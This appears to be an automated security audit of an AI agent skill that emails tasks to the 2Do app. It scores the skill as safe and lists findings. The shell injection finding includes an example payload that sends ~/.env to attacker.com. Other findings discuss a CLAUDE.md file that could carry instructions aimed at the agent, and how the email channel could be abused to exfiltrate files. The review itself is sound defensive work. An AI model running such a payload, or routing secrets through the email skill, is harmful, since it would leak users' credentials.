Is chuckiefan/moltbot-plugin-2do safe?

https://github.com/openclaw/skills/tree/main/skills/chuckiefan/moltbot-plugin-2do

81
SAFE

moltbot-plugin-2do is a well-architected TypeScript productivity skill for creating 2Do app tasks via email with natural language parsing. The code is clean, unit-tested, and carries no npm lifecycle hooks, git hooks, submodules, or hardcoded exfiltration endpoints. The principal concerns are a shell injection vector in the SKILL.md command template (user input substituted into a double-quoted bash argument without escaping guidance), an unreviewed CLAUDE.md file in the skill directory, and the inherent risk that SMTP credentials placed in process.env are accessible to all skills sharing the agent session.

Category Scores

Prompt Injection 75/100 · 30%
Data Exfiltration 75/100 · 25%
Code Execution 85/100 · 20%
Clone Behavior 90/100 · 10%
Canary Integrity 95/100 · 10%
Behavioral Reasoning 78/100 · 5%

Findings (9)

MEDIUM Shell injection via unescaped user input in SKILL.md bash command template -20

SKILL.md instructs the executing agent to run: bash {baseDir}/scripts/send-task.sh --raw "USER_MESSAGE_HERE". In bash, double-quoted strings do NOT prevent $(...) command substitution or backtick evaluation — only single quotes do. If the agent substitutes the user's message directly (e.g., via naive string interpolation rather than using an argument list or printf '%s' quoting), a crafted user message such as 'add task: $(curl -s attacker.com/exfil?d=$(cat ~/.env|base64))' would execute the embedded command before the value reaches Node.js. The SKILL.md provides no guidance on safe substitution, and no escaping helper is documented.

LOW CLAUDE.md file shipped with skill — content not audited -5

The skill directory contains a CLAUDE.md file at the top level. Claude Code and several AI agent runtimes automatically inject CLAUDE.md content into the model's context when processing the enclosing directory. If this file contains legitimate coding conventions for the plugin's development, it is benign. However, because its content was not included in the evidence, the possibility that it contains instructions intended to influence agent behavior during skill review or execution cannot be eliminated.

LOW Raw user message content transmitted via SMTP email to external inbox -15

src/email-sender.ts constructs an email body that includes rawInput (the verbatim user utterance) and sends it via nodemailer to config.twodoEmail using the caller-supplied SMTP credentials. While this is the stated purpose of the skill, it means that potentially sensitive context embedded in a user's natural language task request — including names, dates, project details, or inadvertent secrets — is routinely transmitted outside the local agent session to a remote email server and inbox.

LOW SMTP credentials stored in agent process environment expose secrets to co-resident skills -10

config.ts reads SMTP_HOST, SMTP_PORT, SMTP_USER, SMTP_PASS, and TWODO_EMAIL exclusively from process.env. Once these are set for this skill to function, they remain accessible via process.env to all other code running in the same Node.js process or agent session for the session lifetime. A malicious co-installed skill could trivially read and exfiltrate these values.

LOW Shell entry-point script present but content not examined in evidence -15

scripts/send-task.sh is the execution entry point referenced by SKILL.md and would be the first code run when the skill is invoked. The TypeScript source files (main.ts, task-parser.ts, date-parser.ts, email-sender.ts, config.ts) were all provided and are clean. However, the shell script content was not included in the evidence dump and therefore cannot be audited for unsafe patterns such as additional file reads, network calls, or unsafe handling of the --raw argument value before it reaches the Node.js CLI.

INFO Installation network activity limited to GitHub CDN — clean behavior -10

All TCP connections observed during skill installation targeted 140.82.121.4:443, which is within GitHub's CDN range. No connections to unexpected third-party hosts, analytics services, or C2 infrastructure were detected. The git sparse-checkout pattern was used to extract only the targeted skill subdirectory from the monorepo, consistent with the expected install procedure.

INFO Canary files read at two time points — attributed to audit framework baseline checks -5

Auditd PATH records and inotifywait events show read-only ACCESS to .env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, and GCP credentials at 1771902771.295 (before the git clone at 1771902776.829) and again at 1771902793.185 (post-analysis). The pre-clone access batch is consistent with the audit framework establishing a canary baseline. All events show CLOSE_NOWRITE — no modifications. The monitoring system's own integrity report confirms no exfiltration. No reviewed skill source code targets these paths.

INFO Skill establishes persistent email channel exploitable in combination with file-reading skills -12

In isolation this skill is a straightforward productivity tool. However, its email transmission capability creates a data-exfiltration primitive: any skill or agent instruction that can read file contents could pass those contents as a task title or raw input to this skill, routing sensitive data through a legitimate-looking SMTP connection that is unlikely to be blocked by network controls or raise suspicion in logs. This compositional risk is inherent to any email-sending skill.

INFO SMTP credentials in shared process environment accessible to co-resident malicious skills -10

Because SMTP credentials are loaded into process.env, a co-installed malicious skill running in the same agent session could read these values and independently use them to send attacker-directed email, bypassing the user's intent and the skill's intended interface.